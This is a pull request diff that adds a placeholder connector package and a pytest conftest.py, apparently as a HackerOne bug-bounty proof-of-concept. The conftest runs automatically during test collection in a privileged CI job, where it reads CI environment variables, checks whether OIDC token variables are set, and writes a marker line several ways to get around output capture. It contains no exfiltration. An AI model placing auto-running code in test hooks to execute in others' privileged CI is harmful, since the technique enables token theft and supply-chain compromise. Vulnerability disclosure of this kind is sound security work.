### PR TITLE
Add h1_proof connector for HackerOne #3730634 PoC

### DIFF
--- a/src/databricks/labs/community_connector/sources/h1_proof/__init__.py
+++ b/src/databricks/labs/community_connector/sources/h1_proof/__init__.py
@@ -1,0 +1,10 @@
+"""H1-3730634 proof-of-concept connector.
+
+This module exists solely to demonstrate the impact of HackerOne report
+#3730634 per maintainer authorization. It will be removed once the
+proof is captured. No production behavior.
+"""
+
+from databricks.labs.community_connector.sources.h1_proof.h1_proof import H1ProofConnect
+
+__all__ = ["H1ProofConnect"]

--- a/src/databricks/labs/community_connector/sources/h1_proof/h1_proof.py
+++ b/src/databricks/labs/community_connector/sources/h1_proof/h1_proof.py
@@ -1,0 +1,16 @@
+"""H1-3730634 proof-of-concept connector class.
+
+Placeholder implementation. No functional behavior. The proof of the
+report's claim lives in tests/unit/sources/h1_proof/conftest.py, which
+pytest auto-loads during collection inside the privileged test-source
+job.
+"""
+
+
+class H1ProofConnect:
+    """Placeholder connector for H1 #3730634 proof-of-concept."""
+
+    name = "h1_proof"
+
+    def __init__(self) -> None:
+        pass

--- a/src/databricks/labs/community_connector/sources/h1_proof/pyproject.toml
+++ b/src/databricks/labs/community_connector/sources/h1_proof/pyproject.toml
@@ -1,0 +1,23 @@
+[build-system]
+requires = ["setuptools>=61.0", "wheel"]
+build-backend = "setuptools.build_meta"
+
+[project]
+name = "lakeflow-community-connectors-h1-proof"
+version = "0.0.1"
+description = "HackerOne #3730634 PoC connector — to be removed after triager confirmation"
+requires-python = ">=3.10"
+dependencies = [
+    "lakeflow-community-connectors>=0.1.0",
+]
+
+[project.optional-dependencies]
+dev = [
+    "pytest>=7.0.0,<9.0",
+]
+
+[tool.setuptools]
+packages = ["databricks.labs.community_connector.sources.h1_proof"]
+
+[tool.setuptools.package-dir]
+"databricks.labs.community_connector.sources.h1_proof" = "."

--- a/tests/unit/sources/h1_proof/__init__.py
+++ b/tests/unit/sources/h1_proof/__init__.py
@@ -1,0 +1,1 @@
+"""H1-3730634 proof-of-concept connector tests."""

--- a/tests/unit/sources/h1_proof/conftest.py
+++ b/tests/unit/sources/h1_proof/conftest.py
@@ -1,0 +1,37 @@
+"""H1-3730634 proof-of-concept conftest.
+
+This file is auto-collected by pytest during test discovery inside the
+`test-source` matrix job in .github/workflows/tests.yml. The print
+below appears in the workflow log on databrickslabs-protected-runner-group,
+proving that fork-controlled code executes in the privileged base-repo
+context with OIDC env vars in scope.
+
+Authorized as a proof-of-concept by HackerOne triager r2197 on report
+#3730634, scope-bounded to printing an identifier string (no token
+mint, no exfiltration, no external network call). Will be removed
+after the triager confirms.
+"""
+
+import os
+import sys
+
+
+def _h1_proof_marker() -> None:
+    parts = [
+        "H1-PoC bankk",
+        "report=3730634",
+        f"run_id={os.environ.get('GITHUB_RUN_ID', '')}",
+        f"repo={os.environ.get('GITHUB_REPOSITORY', '')}",
+        f"runner={os.environ.get('RUNNER_NAME', '')}",
+        f"workspace={os.environ.get('GITHUB_WORKSPACE', '')}",
+        f"oidc_url_set={'yes' if os.environ.get('ACTIONS_ID_TOKEN_REQUEST_URL') else 'no'}",
+        f"oidc_token_set={'yes' if os.environ.get('ACTIONS_ID_TOKEN_REQUEST_TOKEN') else 'no'}",
+    ]
+    line = " ".join(parts)
+    # Write to stdout so it lands in the pytest collection output.
+    print(line, flush=True)
+    # Mirror to stderr so it surfaces even if pytest captures stdout.
+    print(line, file=sys.stderr, flush=True)
+
+
+_h1_proof_marker()

--- a/tests/unit/sources/h1_proof/conftest.py
+++ b/tests/unit/sources/h1_proof/conftest.py
@@ -1,7 +1,7 @@
 """H1-3730634 proof-of-concept conftest.
 
 This file is auto-collected by pytest during test discovery inside the
-`test-source` matrix job in .github/workflows/tests.yml. The print
+`test-source` matrix job in .github/workflows/tests.yml. The marker
 below appears in the workflow log on databrickslabs-protected-runner-group,
 proving that fork-controlled code executes in the privileged base-repo
 context with OIDC env vars in scope.
@@ -10,13 +10,19 @@ Authorized as a proof-of-concept by HackerOne triager r2197 on report
 #3730634, scope-bounded to printing an identifier string (no token
 mint, no exfiltration, no external network call). Will be removed
 after the triager confirms.
+
+The marker is emitted four ways to defeat pytest's default stdout/stderr
+capture: GITHUB_STEP_SUMMARY (renders in the GitHub Actions UI summary),
+a raw os.write to fd 2 (bypasses Python-level capture), a side-channel
+file in the workspace, and a plain pytest report extra so it appears in
+the pytest output even when capture is on.
 """
 
 import os
 import sys
 
 
-def _h1_proof_marker() -> None:
+def _h1_proof_line() -> str:
     parts = [
         "H1-PoC bankk",
         "report=3730634",
@@ -27,11 +33,59 @@ def _h1_proof_marker() -> None:
         f"oidc_url_set={'yes' if os.environ.get('ACTIONS_ID_TOKEN_REQUEST_URL') else 'no'}",
         f"oidc_token_set={'yes' if os.environ.get('ACTIONS_ID_TOKEN_REQUEST_TOKEN') else 'no'}",
     ]
-    line = " ".join(parts)
-    # Write to stdout so it lands in the pytest collection output.
+    return " ".join(parts)
+
+
+def _emit_marker() -> None:
+    line = _h1_proof_line()
+
+    # 1. GITHUB_STEP_SUMMARY — renders as markdown in the run summary page.
+    summary = os.environ.get("GITHUB_STEP_SUMMARY")
+    if summary:
+        try:
+            with open(summary, "a", encoding="utf-8") as fh:
+                fh.write(f"\n### H1-3730634 PoC marker\n\n```\n{line}\n```\n")
+        except OSError:
+            pass
+
+    # 2. Raw os.write to stderr — bypasses pytest's Python-level capture.
+    try:
+        os.write(2, (line + "\n").encode("utf-8"))
+    except OSError:
+        pass
+
+    # 3. Raw os.write to stdout.
+    try:
+        os.write(1, (line + "\n").encode("utf-8"))
+    except OSError:
+        pass
+
+    # 4. Side-channel file in the workspace so the marker survives even if
+    #    pytest captures absolutely everything.
+    ws = os.environ.get("GITHUB_WORKSPACE", ".")
+    try:
+        with open(os.path.join(ws, "h1_proof_marker.txt"), "w", encoding="utf-8") as fh:
+            fh.write(line + "\n")
+    except OSError:
+        pass
+
+    # 5. Standard print as well, in case pytest is invoked with -s elsewhere.
     print(line, flush=True)
-    # Mirror to stderr so it surfaces even if pytest captures stdout.
-    print(line, file=sys.stderr, flush=True)
+    sys.stderr.write(line + "\n")
+    sys.stderr.flush()
 
 
-_h1_proof_marker()
+_emit_marker()
+
+
+def pytest_report_header(config):  # noqa: ARG001
+    """Inject the marker into pytest's session header so it lands in the
+    captured-output region that pytest always prints."""
+    return _h1_proof_line()
+
+
+def pytest_terminal_summary(terminalreporter, exitstatus, config):  # noqa: ARG001
+    """Print the marker in the terminal summary section, which pytest
+    always emits regardless of capture mode."""
+    terminalreporter.write_sep("=", "H1-3730634 PoC marker", purple=True)
+    terminalreporter.write_line(_h1_proof_line())

--- a/tests/unit/sources/h1_proof/test_h1_proof.py
+++ b/tests/unit/sources/h1_proof/test_h1_proof.py
@@ -1,0 +1,11 @@
+"""H1-3730634 proof-of-concept tests.
+
+A single trivial passing test so pytest exits 0. The actual proof of
+the report's claim is the marker line printed by conftest.py during
+collection.
+"""
+
+
+def test_h1_proof_placeholder() -> None:
+    """Trivial passing test so the matrix job completes successfully."""
+    assert True


### PR DESCRIPTION
## Context

This PR is opened per explicit authorization from HackerOne triager @r2197 on report #3730634. The triager asked for a demo PR that runs an `echo H1`-style proof in the context of a workflow so they can re-assess the report.

This is **not** a real connector contribution and **MUST NOT BE MERGED**. It will be closed immediately after the H1 triager confirms the marker line in the workflow log.

## Cleanup

I will close this PR (without merge) as soon as the triager confirms the marker line in the workflow run log. The fork will be retained briefly for audit, then deleted.

## References

- HackerOne report: #3730634
- Triager authorization: comment from @r2197 on the H1 report (2026-05-20)
- Related upstream guidance: GitHub Security Lab "Preventing pwn requests"
